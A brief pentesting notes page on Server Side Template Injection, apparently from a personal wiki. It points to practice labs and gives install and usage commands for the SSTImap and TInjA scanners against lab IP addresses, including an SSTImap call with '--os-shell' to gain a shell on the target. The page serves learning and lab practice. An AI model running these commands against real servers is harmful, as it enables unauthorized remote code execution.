SSTI

Notes about some basic Server Side Template Injection attack

Server Side Template Injection (SSTI) is a web exploit which takes advantage of an insecure implementation of a template engine.

Playground

THM: SSTI
Template Injection Playground

Identification

Template Injection Table

Tools

SSTImap

## Install
git clone https://github.com/vladko312/SSTImap
cd SSTImap
python3 -m venv sstimap_env
source sstimap_env/bin/activate

Usage:
python3 sstimap.py --help
python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/*
python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/* --engine Jinja2
python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/* --engine Jinja2 --os-shell

TInjA – the Template INJection Analyzer

https://github.com/Hackmanit/TInjA

tinja url -u "http://10.10.242.241:5000/vuln?name=a"

Resources

https://hackerone.com/reports/125980
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

PreviousJoomla NextFile Inclusion

Last updated 3 months ago